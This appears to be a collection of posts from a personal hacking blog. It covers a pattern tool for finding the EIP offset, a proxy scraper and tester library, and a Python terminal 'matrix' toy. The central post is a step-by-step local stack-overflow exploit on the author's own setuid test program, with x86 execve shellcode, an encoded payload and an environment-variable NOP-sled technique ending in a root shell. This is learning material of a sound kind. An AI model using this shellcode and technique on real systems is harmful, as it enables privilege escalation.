buff += "n3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9"
buff += "Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq"
buff += "6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2F"
buff += "s3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9"
buff += "Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv"
buff += "6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2F"
buff += "x3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9"
buff += "Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga"
buff += "6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2G"
buff += "c3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9"
buff += "Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf"
buff += "6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2G"
buff += "h3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9"
buff += "Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

Output has been saved in StackFlowers.log

gunslinger@c0debreaker:/media/disk/stackflowers$

and we load it into program that vulnerable stack overflow attack and attach it with debugger. and see what eip register overwritten by what.
i use immunity debugger in this case.

debugger tell us that register eip contains 0x356b4234 (that representation of 34 42 6b 35 = 4Bk5). now we locate where is 0x356b4234 location of the pattern exactly.

now we know that pattern start at 1094 bytes + 4 bytes to overwrite eip register.

ok that just an example of using the program, you can try it by your self. and you can read the source of the program, browse project here https://sourceforge.net/projects/stackflowers/files/ . in future day i’ll write win32 exploit development here. but in indonesian language, so keep in touch.

allright, take it easy.


PyProxy | Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library


This idea is taken after doing any research with some socket. and finally, i need some proxy for it’s research .
so i’m going to make something to parse proxy in every site and has a proxy checker ability
and i need to use / import that dinamically for the research, so i must play with the object too .

This article will introduce a python library has done by me
the name is PyProxy .
PyProxy is a Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library
This is can be use by direct or you can import this to your program

for direct use , you just need to execute this library . you will see the help module along with the library
by adding -h or –help in first argument

PyProxy v.09 by Gunslinger_ <yudha.gunslinger@gmail.com> - Proxy Hunter and Tester Opensource engine
A high-level cross-protocol proxy-hunter

Usage: pyproxy.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --samair          just use samair.ru to hunt proxies
  -l, --sitelist        use all site in the list
  -t, --test            test all proxy !
  -a, --all             do all !
  -v, --version         print current proxy hunter version
  -d, --debug           debug program for more talkable & every proxy will be
                        print to screen
  -o FILE, --outputfile=FILE
                        output proxy will be print
                        [default : proxylist.txt]
  -i FILE, --inputfile=FILE
                        input proxy will be checked
                        [default : proxylist.txt]
  -g FILE, --outputgood=FILE
                        output all good proxy will be saved
                        [default : goodproxy.txt]
  -c NUMBER, --timeout=NUMBER
                        timeout connections being program run
                        [default : 30]

  Example :
    pyproxy.py -s                   | Gather proxy with samair.ru
    pyproxy.py -l                   | Gather proxy in the url list
    pyproxy.py -t proxylist.txt     | Test proxy inside proxylist.txt
    pyproxy.py -a                   | Do all
    pyproxy.py -v                   | Print current version

for advance user / python programmer .
we can use it in PyShell too by import them inside

gunslinger@c0debreaker:~/python/lib$ python
Python 2.6.2 (release26-maint, Apr 19 2009, 01:56:41) 
[GCC 4.3.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pyproxy
>>> help(pyproxy)
Help on module pyproxy:

NAME
    pyproxy

FILE
    /home/gunslinger/python/module/pyproxy/pyproxy.py

DESCRIPTION
    # -*- coding: utf-8 -*-
    #   This library is free software; you can redistribute it and/or
    #   modify it under the terms of the GNU Lesser General Public
    #   License as published by the Free Software Foundation; either
    #   version 2.1 of the License, or (at your option) any later version.
    #
    #   This library is distributed in the hope that it will be useful,
    #   but WITHOUT ANY WARRANTY; without even the implied warranty of
    #   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
    #   Lesser General Public License for more details.
    #
    #   You should have received a copy of the GNU Lesser General Public
    #   License along with this library; if not, write to the 
    #      Free Software Foundation, Inc., 
    #      59 Temple Place, Suite 330, 
    #      Boston, MA  02111-1307  USA
    #
    #   Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
    #   http://bit.ly/c0debreaker

CLASSES
    __builtin__.object
        proxyhunter
        runengine
    
    class proxyhunter(__builtin__.object)
     |  Instance variables:
     |   
     |  Outputproxy
     |          Output file every proxy will be printed in
     |          Default : proxylist.txt
     |  
     |  Goodproxy
     |          Output file all good proxy will be print
     |          Default : goodproxylist.txt
     |  
     |  Verbose
     |          More noise, every proxy will be print into screen
     |          Default : True
     |  Timeout
     |          Timeout every test proxy connections in socket
     |          Default : 30
     |  
     |  Sitelist
     |          Proxy site for parsing proxy
     |          Default : []
     |  
     |  Methods defined here:
     |  
     |  Cleanitup(self, sorted_output='uniqueproxylist.txt')
     |      proxy will be printed in uniqueproxylist.txt by default
     |  
     |  CoreFreshTester(self, proxy)
     |  
     |  LoadProxy(self)
     |  
     |  MainFreshTester(self, proxy)
     |  
     |  ParseProxy(self, site)
     |  
     |  Samairdotru(self)
     |  
     |  Single(self)
     |  
     |  TestProxy(self)
     |  
     |  __init__(self, OutputProxy='proxylist.txt', GoodProxy='goodproxylist.txt', Verbose=True, TimeOut=30, Sitelist=[])
     |  
     |  ----------------------------------------------------------------------
     |  Data descriptors defined here:
     |  
     |  __dict__
     |      dictionary for instance variables (if defined)
     |  
     |  __weakref__
     |      list of weak references to the object (if defined)
    
    class runengine(__builtin__.object)
     |  Methods defined here:
     |  
     |  __init__(self)
     |  
     |  parseoption(self)
     |  
     |  printversion(self)
     |  
     |  run(self)
     |  
     |  ----------------------------------------------------------------------
     |  Data descriptors defined here:
     |  
     |  __dict__
     |      dictionary for instance variables (if defined)
     |  
     |  __weakref__
     |      list of weak references to the object (if defined)

FUNCTIONS
    main()

DATA
    __author__ = 'Gunslinger_ <yudha.gunslinger@gmail.com>'
    __copyright__ = 'Copyright (c) 2010 Gunslinger_'
    __date__ = 'Thu Oct  7 00:00:41 2010'
    __version__ = '09'
    __warningregistry__ = {('the sets module is deprecated', <type 'except...

VERSION
    09

DATE
    Thu Oct  7 00:00:41 2010

AUTHOR
    Gunslinger_ <yudha.gunslinger@gmail.com>

(END) q

Need parse proxy in any site ? simply like this

>>> ph = pyproxy.proxyhunter()
>>> ph.ParseProxy("http://aliveproxy.com/high-anonymity-proxy-list/")
[*] Parse proxy from aliveproxy.com/high-anonymity-proxy-list/
218.182.134.23:8080
210.158.6.201:8080
174.142.24.201:3128
217.23.137.56:80
174.142.104.57:3128
205.213.195.70:8080
174.142.24.203:3128
174.142.24.205:3128
24.155.96.93:0080
174.142.24.204:3128
[*] 10 Proxies receieved from : aliveproxy.com/high-anonymity-proxy-list/ 

This module can be use for proxy testing too

>>> import pyproxy
>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt")
>>> ph.LoadProxy()
[*] File successfully loaded...
>>> ph.TestProxy()
Error : <urlopen error [Errno 111] Connection refused>
[*] 218.182.134.23:8080 
 '--------------> Bad
Error : <urlopen error [Errno 111] Connection refused>
[*] 210.158.6.201:8080 
 '--------------> Bad
Date: Fri, 08 Oct 2010 12:56:21 GMT
Server: gws
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-XSS-Protection: 1; mode=block
Set-Cookie: PREF=ID=3b034e546cd351bf:TM=1286542581:LM=1286542581:S=EmivqSAOZBhj22iF; expires=Sun, 07-Oct-2012 12:56:21 GMT; path=/; domain=.google.ca
Set-Cookie: NID=39=AQ2UnSEV0xbVMzzwrlcIhBN6dBszmQNIrHgh_iggOQh2JB8pBqz8bIrsxWQv-YX_6jaB3HlMJ7U1ghKURQyUM5evLmenr8vy9ByPZcVM-rkOGsf6nMNxxLQST1SkyJZK; expires=Sat, 09-Apr-2011 12:56:21 GMT; path=/; domain=.google.ca; HttpOnly
Connection: close
Transfer-Encoding: chunked

...
[*] 174.142.24.201:3128 
 '--------------> Good
[*] All Fresh proxy has been saved in goodproxylist.txt
>>> 

doesn’t need more noise ? take down the Verbose variable to False

>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt", Verbose=False)
>>> ph.LoadProxy()
[*] File successfully loaded...
>>> ph.TestProxy()
[*] 218.182.134.23:8080 
 '--------------> Good
[*] 210.158.6.201:8080 
 '--------------> Good
[*] 174.142.24.201:3128 
 '--------------> Good
[*] 217.23.137.56:80 
 '--------------> Good
[*] 174.142.104.57:3128 
 '--------------> Good
[*] 205.213.195.70:8080 
 '--------------> Bad
[*] 174.142.24.203:3128 
 '--------------> Good
[*] 174.142.24.205:3128 
 '--------------> Good
[*] 24.155.96.93:0080 
 '--------------> Bad
[*] 174.142.24.204:3128 
 '--------------> Good
[*] All Fresh proxy has been saved in goodproxylist.txt
>>> 

For more infomations, you can take a look at the source
you can find the project here https://sourceforge.net/projects/pyproxy/
hope can be useful for you ;)


play with ron.c


i found in internet about this source .
but exploitation trick is about oldstyle, so it’s useless .
so i’ve been challenged in .
play with ron.c

gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
 /**
    * Name: StackVuln.c
    * Author: Ron Bowes
    * Date: March 24, 2004
    * To compile: gcc StackVuln.c -o StackVuln
    * Requires: n/a
    *
    * Purpose: This code is vulnerable to a stack overflow if more than
    * 20 characters are entered. The exploit for it was written by
    * Jon Erickson in Hacking: Art of exploitation, but I wrote
    * this vulnerable code independently.
    */
    #include <stdio.h>
    #include <string.h>
    int main(int argc, char *argv[])
    {
        char string[40];
        strcpy(string, argv[1]);
        printf("The message was: %s\n", string);
        printf("Program completed normally!\n\n");
        return 0;
    }


gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger: 
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' 			[Ok]
[*] Checking null on randomize_va_space 				[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x1d	29
edx            0xb7fc50d0	-1208201008
ebx            0xb7fc3ff4	-1208205324
esp            0xbffff4d0	0xbffff4d0
ebp            0x41414141	0x41414141
esi            0x8048480	134513792
edi            0x8048370	134513520
eip            0x41414141	0x41414141
eflags         0x10246	[ PF ZF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) list
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
21	        return 0;
22	    }
23	
(gdb) list 1
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is

Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) i r esp
esp            0xbffff488	0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password: 
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"  > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py  bof1    bof2.c  bof.c    bufferbruteforce.py  displant.c  easy.c  get_env    man-pages    ron             shellcode.bin  smashme2    vanish.c
bf2.py  bof1.c  bof3    brute    core                 easy2       expl    get_env.c  objdasm.vim  ron.c           shellcode.c    smashme2.c
bof     bof2    bof3.c  brute.c  displant             easy2.c     expl.c  hts        passwd.php   shellcode3.bin  smashme        smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n"  $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
	(Missing operator before  "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
	(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof# 

matrix.py [matrix in python]


do you know matrix movie ?

here i make some code about matrix in python ..
here you go !

#!/usr/bin/python
# -*- coding: utf-8 -*-
# gunslinger_ 08 feb 2010
# this code is protected under the gpl
# get your copy at <http://www.gnu.org/licenses/>

import os, time, random, sys

class message(str):
    def __new__(cls, text, speed):
        self = super(message, cls).__new__(cls, text)
        self.speed = speed
        self.y = -1*len(text)
        self.x = random.randint(0, display().width)
        self.skip = 0
        return self

    def move(self):
        if self.speed > self.skip:
            self.skip += 1
        else:
            self.skip = 0
            self.y += 1

class display(list):
    def __init__(self):
        self.height, self.width = [int(x) for x in os.popen('stty size', 'r').read().split()]
        self[:] = [' ' for y in xrange(self.height) for x in xrange(self.width)]

    def set_vertical(self, x, y, string):
        string = string[::-1]
        if x < 0:
            x = 80 + x
        if x >= self.width:
            x = self.width-1
        if y < 0:
            string = string[abs(y):]
            y = 0
        if y + len(string) > self.height:
            string = string[0:self.height - y]
        if y >= self.height:
            return
        start = y*self.width+x
        length = self.width*(y+len(string))
        step = self.width

        self[start:length:step] = string

    def __str__(self):
        return ''.join(self)

i_message = raw_input("Input a message: ")
messages = [message(i_message, random.randint(1, 5))]
for t in xrange(1000000):
    messages.append(message(i_message[::-1], random.randint(1, 5)))
    d = display()
    for text in messages:
        d.set_vertical(text.x, text.y, text)
        text.move()
    sys.stdout.write(str(d))
    sys.stdout.flush()
    del d
    time.sleep(0.1)

Belajar Membuat Website dengan Adobe Dreamweaver

for best view, you must install konsole in your system :
to get it just type : sudo apt-get install konsole

and here example